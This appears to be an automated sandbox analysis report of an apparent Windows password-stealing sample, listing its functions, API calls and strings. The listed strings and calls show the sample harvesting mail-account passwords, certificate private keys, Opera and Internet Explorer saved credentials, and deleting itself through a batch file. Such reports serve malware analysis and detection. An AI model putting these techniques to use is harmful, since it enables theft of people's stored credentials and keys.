lstrlen lstrlen lstrcpy lstrcat 11418->11422 11419 401d71 6 API calls 11419->11422 11420 4043dc 2 API calls 11420->11422 11421 4018b8 LocalFree 11421->11422 11422->11415 11422->11418 11422->11419 11422->11420 11422->11421 11423 40d072 13 API calls 11422->11423 11424 4015cb lstrlen 11422->11424 11423->11422 11424->11422 11426 401d71 6 API calls 11425->11426 11433 40d2e7 11426->11433 11427 40d356 11427->9613 11428 40d351 11429 4018b8 LocalFree 11428->11429 11429->11427 11430 40d309 wsprintfA 11431 401d71 6 API calls 11430->11431 11431->11433 11432 40406c 16 API calls 11432->11433 11433->11427 11433->11428 11433->11430 11433->11432 11434 4018b8 LocalFree 11433->11434 11434->11433 11436 401eb1 7 API calls 11435->11436 11437 4076fe 11436->11437 11438 407750 11437->11438 11439 401e4c 6 API calls 11437->11439 11438->9646 11440 40770d 11439->11440 11441 404351 41 API calls 11440->11441 11442 407723 11441->11442 11443 404351 41 API calls 11442->11443 11444 407737 11443->11444 11445 404351 41 API calls 11444->11445 11446 40774b 11445->11446 11447 4018b8 LocalFree 11446->11447 11447->11438 11449 401eb1 7 API calls 11448->11449 11450 4077a4 11449->11450 11451 40784f 11450->11451 11452 4077c0 11450->11452 11453 401e4c 6 API calls 11450->11453 11451->9654 11454 401df8 5 API calls 11452->11454 11453->11452 11455 4077d0 11454->11455 11456 40406c 16 API calls 11455->11456 11457 4077df 11456->11457 11458 4018b8 LocalFree 11457->11458 11459 4077e4 11458->11459 11460 401df8 5 API calls 11459->11460 11461 4077f1 11460->11461 11462 40406c 16 API calls 11461->11462 11463 407800 11462->11463 11464 4018b8 LocalFree 11463->11464 11465 407805 11464->11465 11466 401df8 5 API calls 11465->11466 11480 408e09 11479->11480 11489 408d3e 11479->11489 11480->9674 11481 408d45 RegEnumKeyExA 11482 408d6e RegCloseKey 11481->11482 11481->11489 11482->11480 11484 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11484->11489 11485 401d71 6 API calls 11485->11489 11487 4018b8 LocalFree 11487->11489 11488 408d1e 11 API calls 11488->11489 11489->11481 11489->11484 11489->11485 11489->11487 11489->11488 11505 404043 11489->11505 11491 408f4b 11490->11491 11499 408e2d 11490->11499 11491->9678 11492 408e34 RegEnumKeyExA 11493 408e5d RegCloseKey 11492->11493 11492->11499 11493->11491 11495 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11495->11499 11496 4018b8 LocalFree 11496->11499 11497 401d71 6 API calls 11497->11499 11498 40242b 9 API calls 11498->11499 11499->11492 11499->11495 11499->11496 11499->11497 11499->11498 11500 408eb1 11499->11500 11502 408e0d 50 API calls 11499->11502 11501 401f7e GetFileAttributesA 11500->11501 11503 404351 41 API calls 11500->11503 11504 4018b8 LocalFree 11500->11504 11501->11500 11502->11499 11503->11500 11504->11499 11506 404068 11505->11506 11507 40404c 11505->11507 11506->11489 11507->11506 11508 4015cb lstrlen 11507->11508 11508->11506 11509->9683 11511 404c4d 11510->11511 11512 404b2b 11510->11512 11511->9688 11513 401e4c 6 API calls 11512->11513 11515 404b44 11512->11515 11513->11515 11514 401d71 6 API calls 11516 404b5e 11514->11516 11515->11514 11517 404b80 11516->11517 11519 401df8 5 API calls 11516->11519 11518 401d71 6 API calls 11517->11518 11520 404b96 11518->11520 11521 404b6c 11519->11521 11523 404bb8 11520->11523 11526 401df8 5 API calls 11520->11526 11522 404b07 16 API calls 11521->11522 11524 404b76 11522->11524 11525 401d71 6 API calls 11523->11525 11527 4018b8 LocalFree 11524->11527 11528 404bcf 11525->11528 11529 404ba4 11526->11529 11530 404b7b 11527->11530 11531 404bf1 11528->11531 11534 401df8 5 API calls 11528->11534 11532 404b07 16 API calls 11529->11532 11533 4018b8 LocalFree 11530->11533 11535 401d71 6 API calls 11531->11535 11536 404bae 11532->11536 11533->11517 11537 404bdd 11534->11537 11539 4018b8 LocalFree 11536->11539 11566 40e575 11565->11566 11567 40e579 11565->11567 11566->9755 11576 4018cf LocalAlloc 11567->11576 11569 40e583 lstrlen 11571 40e5c2 11569->11571 11572 40e5ad 11569->11572 11574 4018b8 LocalFree 11571->11574 11573 404351 41 API calls 11572->11573 11573->11571 11575 40e5ca 11574->11575 11575->9755 11576->11569

                                                Executed Functions

                                                Function 00410065 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 158stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00410092
                                                • wsprintfA.USER32 ref: 004100A0
                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410100
                                                • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410116
                                                • lstrcat.KERNEL32(?,?), ref: 0041012A
                                                • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410143
                                                • lstrcpy.KERNEL32(?,?), ref: 0041015A
                                                • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 00410166
                                                • lstrcpy.KERNEL32(00000001,?), ref: 00410174
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                                                • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                                                • API String ID: 629621046-4169620016
                                                • Opcode ID: 51fe474169a1c61bec2a245e5406ea64e237c4c59cb211578291ded0f9fd4f68
                                                • Instruction ID: d87f7c95a24b28c2337a621791b8d5a4a1afbdb6f7934d1f864dba4089bdb773
                                                • Opcode Fuzzy Hash: 51fe474169a1c61bec2a245e5406ea64e237c4c59cb211578291ded0f9fd4f68
                                                • Instruction Fuzzy Hash: C5413030B542057ADF1576A18C03FEE7AA7AB85704F24843A7614F62E1EEF94DD05A1C
                                                Function 0040EBA3 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EBB6
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EBEA
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                • API String ID: 1332880857-2111798378
                                                • Opcode ID: 3e868bbcc0dd9ada4210e77e52b4ab6d2948a5b27e69a32f849be68ab5541d54
                                                • Instruction ID: e2a117a2fde9dc82a56ede7dd39e4504eb823868495590e5bf7fc199db2764f0
                                                • Opcode Fuzzy Hash: 3e868bbcc0dd9ada4210e77e52b4ab6d2948a5b27e69a32f849be68ab5541d54
                                                • Instruction Fuzzy Hash: E871A23194011CAADF226F51CC02FEDBAB6FF04704F1485BAB558740B1DB7A5BA1AF88
                                                Function 0040D3BE Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142encryptionstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 246 40d3be-40d3dc call 4015f0 249 40d3e2-40d3e9 246->249 250 40d5af-40d5bd call 401636 246->250 249->250 252 40d3ef-40d3f6 249->252 252->250 254 40d3fc-40d403 252->254 254->250 255 40d409-40d410 254->255 255->250 256 40d416-40d41d 255->256 256->250 257 40d423-40d42a 256->257 257->250 258 40d430-40d437 257->258 258->250 259 40d43d-40d451 CertOpenSystemStoreA 258->259 259->250 260 40d457 259->260 261 40d459-40d467 CertEnumCertificatesInStore 260->261 262 40d469-40d5a9 CertCloseStore 261->262 263 40d46e-40d47c 261->263 262->250 265 40d482 263->265 266 40d59f 263->266 267 40d595-40d599 265->267 266->261 267->266 268 40d487-40d495 lstrcmp 267->268 269 40d49b-40d49f 268->269 270 40d58f-40d592 268->270 269->270 271 40d4a5-40d4cd call 4018cf call 401906 lstrcmp 269->271 270->267 276 40d4d3-40d4ea CryptAcquireCertificatePrivateKey 271->276 277 40d587-40d58a call 4018b8 271->277 276->277 278 40d4f0-40d502 CryptGetUserKey 276->278 277->270 280 40d504-40d51b CryptExportKey 278->280 281 40d57c-40d581 CryptReleaseContext 278->281 282 40d573-40d576 CryptDestroyKey 280->282 283 40d51d-40d540 call 4018cf CryptExportKey 280->283 281->277 282->281 286 40d542-40d566 call 401569 call 40159f * 2 283->286 287 40d56b-40d56e call 4018b8 283->287 286->287 287->282
                                                APIs
                                                • CertOpenSystemStoreA.CRYPT32(00000000,00416871), ref: 0040D444
                                                • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D45D
                                                • lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D48E
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • lstrcmp.KERNEL32(?,0041687E), ref: 0040D4C6
                                                • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D4E2
                                                • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D4FA
                                                • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D513
                                                • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D538
                                                • CryptDestroyKey.ADVAPI32(?), ref: 0040D576
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D581
                                                • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D5A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                                • String ID: 2.5.29.37
                                                • API String ID: 2649496969-3842544949
                                                • Opcode ID: 637e0f19b02e3674b6d4283a020c02448b0706c218f3461ba57614afaf236d84
                                                • Instruction ID: 69ea86f0ab44da64ba056d6111593992adadb32ff072f1572f9399bad78f7f88
                                                • Opcode Fuzzy Hash: 637e0f19b02e3674b6d4283a020c02448b0706c218f3461ba57614afaf236d84
                                                • Instruction Fuzzy Hash: 9A512931900205FBDF21AB94DC09BEEBB71BF44745F148436BA01761F0D779AA94DB98
                                                Function 00404E73 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 404e73-404e8b 295 404e92 294->295 296 404e8d-404e90 294->296 298 404ff0-404ffc call 4018b8 295->298 296->295 297 404e97-404ea1 call 4025a9 296->297 303 404eb2-404eba call 401df8 297->303 304 404ea3-404eb0 call 401df8 297->304 308 404ebf-404eef call 4018e6 FindFirstFileA 303->308 304->308 308->298 311 404ef5-404f01 308->311 312 404f03-404f13 lstrcmpiA 311->312 313 404f68-404f83 StrStrIA 311->313 314 404f15 312->314 315 404f1a-404f30 lstrcmpiA 312->315 316 404f85-404fa4 call 401df8 call 401e4c 313->316 317 404fcb-404fdf FindNextFileA 313->317 314->317 319 404f32 315->319 320 404f37-404f66 call 401df8 call 401e4c call 404e73 call 4018b8 315->320 328 404fb3 316->328 329 404fa6-404fb1 StrStrIA 316->329 317->311 321 404fe5-404feb FindClose 317->321 319->317 320->317 321->298 331 404fb8-404fbb 328->331 329->331 333 404fc6 call 4018b8 331->333 334 404fbd-404fc1 call 404e5c 331->334 333->317 334->333
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00404EE3
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00404F0C
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00404F29
                                                • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404FD8
                                                • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404FEB
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$.ini$Sites\$\*.*
                                                • API String ID: 3040542784-999409347
                                                • Opcode ID: 14502acd3d041963e3dba50669f6717ad26e31770b4fbd5e5981e1a2cdc20703
                                                • Instruction ID: 4ebe6fddfcda91dad50fc3424f79042eee35b7dd55d742c6c8e7d1074e8a7db5
                                                • Opcode Fuzzy Hash: 14502acd3d041963e3dba50669f6717ad26e31770b4fbd5e5981e1a2cdc20703
                                                • Instruction Fuzzy Hash: 763166B090020AAADF11BF61CC42FEE77A9AF80304F1045B7B518B51E1D77C9EC19E59
                                                Function 004045FD Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetVersionExA.KERNEL32(0000009C), ref: 00404646
                                                • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046CB
                                                • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046F4
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047A9
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004047C8
                                                • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047D8
                                                • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                • API String ID: 1787888500-92997708
                                                • Opcode ID: 376afeabaa00fbbc2dd62934deefa5e6c798daae43d80496e7cd973b26a25388
                                                • Instruction ID: db48739d82feba77cf0cee32c0e06214f71ac3aef5999eac4331223504f8986d
                                                • Opcode Fuzzy Hash: 376afeabaa00fbbc2dd62934deefa5e6c798daae43d80496e7cd973b26a25388
                                                • Instruction Fuzzy Hash: 55518471A00218BEEF217B61CC42F9D7A35AF81308F0040BBB649790E1D7B95ED59F5A
                                                Function 00408AE5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00408B3A
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00408B6D
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00408B87
                                                • StrStrIA.SHLWAPI(?,opera,00000000,00414F86,?,00414F84,?,00000000,?), ref: 00408BCC
                                                • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408BFA
                                                • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408C0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                • String ID: \*.*$opera$wand.dat
                                                • API String ID: 3663067366-3278183560
                                                • Opcode ID: a6871aa7f1e592626901312b665b43d8589c5a46e070cd754d38877e57c56036
                                                • Instruction ID: e5ee878ad4cec5bad4980fd33fa9531b0e4dcb501f0c88bdaa15308997453479
                                                • Opcode Fuzzy Hash: a6871aa7f1e592626901312b665b43d8589c5a46e070cd754d38877e57c56036
                                                • Instruction Fuzzy Hash: 88311E7090021D9ADB60AB51CD42AE977B5AB44304F0041BBB548B91E1DB78AEC19F58
                                                Function 004041A6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00404216
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00404243
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00404260
                                                • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040432A
                                                • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040433D
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$\*.*
                                                • API String ID: 3040542784-1692270452
                                                • Opcode ID: bf123e613532cfffce1055e4d4c5b52597834ca5d941327fb15707ae3e25d38e
                                                • Instruction ID: 5e5cf996161199591b6a28a4ff005dbab79564ec832c2e4b7604db23a3f30ec1
                                                • Opcode Fuzzy Hash: bf123e613532cfffce1055e4d4c5b52597834ca5d941327fb15707ae3e25d38e
                                                • Instruction Fuzzy Hash: B44160B0600219AADF11AF61CC06AEE3B69AF84344F1041BBBA18750F1D7789AD1AE59
                                                Function 0040A712 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 0040A71C
                                                • wsprintfA.USER32 ref: 0040A79B
                                                • lstrlenW.KERNEL32(?,?), ref: 0040A7E1
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A824
                                                • LocalFree.KERNEL32(00000000), ref: 0040A85B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                                • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                • API String ID: 1926481713-2450551051
                                                • Opcode ID: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
                                                • Instruction ID: 7cec4ba5f278735bef2daa032c3da861db9c271a8c642e1c0fec04d74f03301a
                                                • Opcode Fuzzy Hash: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
                                                • Instruction Fuzzy Hash: 5A414D72C1021CEADF11AFA1DC01AEDBB79FF04314F14803AF911B61A1D7799A51CB59
                                                Function 004051E3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405252
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00405281
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 0040529B
                                                • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 004052F3
                                                • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405306
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                • String ID: \*.*
                                                • API String ID: 3663067366-1173974218
                                                • Opcode ID: 0500d5f00ee0813dee801a9d420df7e45fb42e5a10b01476559d917fb3a5a69f
                                                • Instruction ID: 4170e0cdbb32cde0fb555d52f6b502d03a9112cbff49fd029bea05776b430742
                                                • Opcode Fuzzy Hash: 0500d5f00ee0813dee801a9d420df7e45fb42e5a10b01476559d917fb3a5a69f
                                                • Instruction Fuzzy Hash: 18312D7190021AAADF21AB61CC42AEE77A9EF00314F0045BAF818B51E2D7789BD19F59
                                                Function 0040A875 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(004162BF,00000000,00000005,004162CF,?), ref: 0040A88D
                                                • StrStrIW.SHLWAPI(00000000,004162EF), ref: 0040A904
                                                • CoTaskMemFree.OLE32(00000000,00000000,004162EF), ref: 0040A92F
                                                • CoTaskMemFree.OLE32(00000000,00000000,00000000,004162EF), ref: 0040A93D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeTask$CreateInstance
                                                • String ID: ($http://www.facebook.com/
                                                • API String ID: 2903366249-3677894361
                                                • Opcode ID: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                                • Instruction ID: fb31eb5c0df78cdbf00d2063a309b2630a064c869b031c3f749717a331f3c059
                                                • Opcode Fuzzy Hash: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                                • Instruction Fuzzy Hash: 5D312A70A00209EBDF119F94C889FDEFB75BF44314F208566E40076290D3799E95DB59
                                                Function 00402968 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029A3
                                                • GetCurrentProcess.KERNEL32 ref: 004029AD
                                                • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004029BB
                                                • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004029FD
                                                • CloseHandle.KERNEL32(00000000), ref: 00402A11
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                • String ID:
                                                • API String ID: 3038321057-0
                                                • Opcode ID: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                                • Instruction ID: e5dea28dedcf19f79be4c8bfd698f998e52e89be124952076ce29543bc0c9a4f
                                                • Opcode Fuzzy Hash: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                                • Instruction Fuzzy Hash: 1A111CB1A04209EFEF218F95DD49BEEB7B4BB40319F148136A151B41D0D7F89684CF19
                                                Function 0041051E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32 ref: 0041051E
                                                • GetUserNameA.ADVAPI32(?,00000101), ref: 0041056E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
